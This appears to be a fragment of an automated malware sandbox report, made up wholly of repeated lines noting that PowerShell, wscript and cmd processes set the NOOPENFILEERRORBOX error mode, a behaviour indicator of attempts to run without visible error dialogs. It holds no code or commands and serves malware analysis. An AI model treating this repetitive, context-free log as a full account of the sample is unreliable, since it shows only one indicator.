                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
